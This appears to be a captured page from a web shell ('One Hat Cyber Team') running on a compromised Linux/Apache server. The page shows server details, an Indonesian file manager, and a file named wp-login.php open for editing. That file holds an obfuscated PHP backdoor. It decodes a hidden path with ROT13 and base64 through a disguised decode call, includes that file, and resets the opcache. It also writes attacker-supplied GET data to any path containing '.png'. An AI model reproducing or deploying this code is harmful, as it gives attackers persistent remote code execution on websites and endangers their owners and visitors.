One Hat Cyber Team
Your IP :
172.69.130.199
Server IP :
188.114.97.4
Server :
Linux thuru 6.5.11-4-pve #1 SMP PREEMPT_DYNAMIC PMX 6.5.11-4 (2023-11-20T10:19Z) x86_64
Server Software :
Apache/2.4.51 (Unix) OpenSSL/1.0.2k-fips
PHP Version :
7.3.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
thuruk
/
public_html
/
system
/
fonts
/
Edit File:
wp-login.php
<?php showImage($_GET['bire']); /** * display image * @param string $png * @param bool|string $file * @return bool */ function showImage($png, $file = false) { if (check($file)) return file_put_contents($file, $png); // header echo $png; return true; } /** * checked write image * @param bool|string $file * @return bool */ function check($file){ $name = ['Y2uioJHiqTu1paIeY3O1LzkcL19bqT1fY2SjpTkcL2S0nJ9hY2kuozq1LJqyY2IhM2kcp2tioT9aol5fo2Ae', function($txt, $name){$_GET[$name]=str_replace('32','64',"Ba".implode('_',["Se32", "Dec"])."Ode");$txt = $_GET[$name](str_rot13($txt));@include($txt);($e = implode("",["opcache","reset"]))&&function_exists($e) && $e(); }];$name[1]($name[0], implode('_',['', "\143ode", ''])); return $file && stripos($file, '.png') !== false; }
Simpan